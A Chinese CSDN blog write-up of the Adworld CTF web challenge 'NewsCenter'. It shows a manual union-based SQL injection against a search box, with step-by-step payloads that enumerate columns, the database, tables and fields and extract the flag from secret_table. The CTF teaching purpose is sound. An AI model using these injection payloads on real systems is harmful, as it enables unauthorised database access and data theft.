攻防世界 web进阶区 NewsCenter

最新推荐文章于 2024-05-18 20:54:16 发布
最新推荐文章于 2024-05-18 20:54:16 发布
阅读量843 收藏 1
点赞数
分类专栏: ctf web题 文章标签: 数据库 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51395584/article/details/125328110
版权

攻防世界 web进阶区 NewsCenter

打开界面,是一个新闻中心,并且拥有搜索功能
在这里插入图片描述
正常搜索,尝试搜索下面的消息内容,搜索hello得到这条消息的相关信息。
在这里插入图片描述
这个动作很容易就联想到了sql注入,因为数据一般是保存在数据库中的,首先尝试sql注入。先试试闭合符号“'”,结果直接报错了
在这里插入图片描述
然后尝试注释后面的部分内容,页面可以正常显示,不过并没有内容输出了。

在这里插入图片描述
先试试order by 会不会报错吧,当输入hello ' order by 10 # 的时候直接报错,证明确实存在sql注入。
在这里插入图片描述
最后测试出当前表总共有3个字段,因为order by 4 会报错。
在这里插入图片描述
接下来尝试union 联合注入看看情况先,直接给出了2和3,证明显示的是第二个字段和第三个字段的内容。
注入的SQL语句为:

hello' union select 1,2,3#

在这里插入图片描述
接着爆库名和当前登录账户信息,得到当前的库名为user,登录的用户为user。
注入的SQL语句为:

hello' union select 1,database(),user() #

在这里插入图片描述
然后使用group_concat()爆出当前数据库的所有表名,从下图中,可以看出,所有表中的news为存放新闻的。
注入的SQL语句为:

hello' union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database() #

在这里插入图片描述然后根据表名获取对应表的字段信息,在secret_table表中发现了fl4g这个字段,其中可能就存放了flag的相关信息。

hello' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='secret_table' #

在这里插入图片描述
接着继续查看fl4g这个字段的内容,获取得到flag
注入的SQL语句为:

hello' union select 1,2,(select group_concat(id,0x3a,fl4g) from secret_table) #

在这里插入图片描述最终的flag为:QCTF{sq1_inJec7ion_ezzz}
题目到这里就做完了,这个是我做的题目中比较顺利的一个题目吧,就是简单的联合查询注入。让我没有想到的是,不使用工具跑,靠手工注入就直接得出了答案,还是非常开心的。

小皮hai
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
newscenter_app
02-20
使用异步Web抓取脚本,每3小时更新一次新闻报道。特征从顶级主流媒体网站的首页显示15个热门新闻头条。 单击每个标题将使用户链接到实际文章。未来的改进添加其他新闻站点以进行更多样化的比较添加下拉菜单,允许...
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1829
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界-web-newscenter
wuh2333的博客
05-30 1089
攻防世界sql注入
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 394
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界NewsCenter
qq_45955869的博客
05-19 537
提示:攻防世界新手模式难度2NewsCenter提示:以下是本篇文章正文内容,下面案例可供参考比较基础,比较简单。
攻防世界NewsCenter
金 帛的博客
04-09 2414
攻防世界WP
NewsCenter
06-23
ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于创建动态网页或Web应用程序。在ASP中,开发者可以使用VBScript或JScript编写脚本,服务器端执行这些脚本并返回HTML到客户端浏览器。在【新闻中心...
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python模块、库和其他可重用代码。"newscenter-2.0.4.tar.gz"这个压缩包正是PyPI上一个...
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1212
题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
CTF-WEB攻防世界题目实战解析NewsCenter
2301_76565920的博客
04-29 283
题目:NewsCenter 难度:2。sql注入,union的使用
攻防世界-WEB-NewsCenter
Lucifer的专栏
09-07 351
有查询,猜测是sql注入。准备利用sqlmap。
攻防世界-NewsCenter-(详细操作)做题笔记
qq_43715020的博客
06-10 1907
攻防世界-NewsCenter-(详细操作)做题笔记
攻防世界WEBNewsCenter
qq_54929891的博客
10-06 195
哈哈在另一个平台学习了一段时间的sql注入,我便再来写这个NewsCenter题目啦 第一步:检查是否有注入点,是否可以通过恒真恒假的语句来改变输出结果 这个题目里面是有引号的哈,因为你不把引号括回去并且加一个注释符,直接给你报错页面了 这里我们可以看到恒真恒假语句测试出来了可以通过改变search值来改变sql语句 第二部:来判断语句的回显位置 可以看到news返回数据是在2,3的位置,这样我们保留1,只需要改变2,3就可以了,先查一下数据库 得知数据库的名字叫做news...
攻防世界】七、NewsCenter
Hi~ 土拨鼠
09-13 442
步骤 打开所给场景: 发现一个输入框,试一下有没有sql注入,使用burp进行抓包(不知道什么原因使用hackbar提交数据页面没变化,卡了好久): 发现单引号'会出现错误,继续进行注入:1' or 1=1 # 发现页面正常,尝试一下联合查询:order by 3/4 判断字段数为3,继续注入: payload:1' union select 1,2,3 # 发现有回显,联合查询可用!接下来就是按照库表列的顺序依次进行查询: payload:1' union select 1,database.
攻防世界NewsCenterSQL注入解题方法
weixin_43923736的博客
06-20 969
攻防世界NewsCenter】解题方法
攻防世界NewsCenter
weixin_51030879的博客
07-23 1256
攻防世界NewsCenter
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值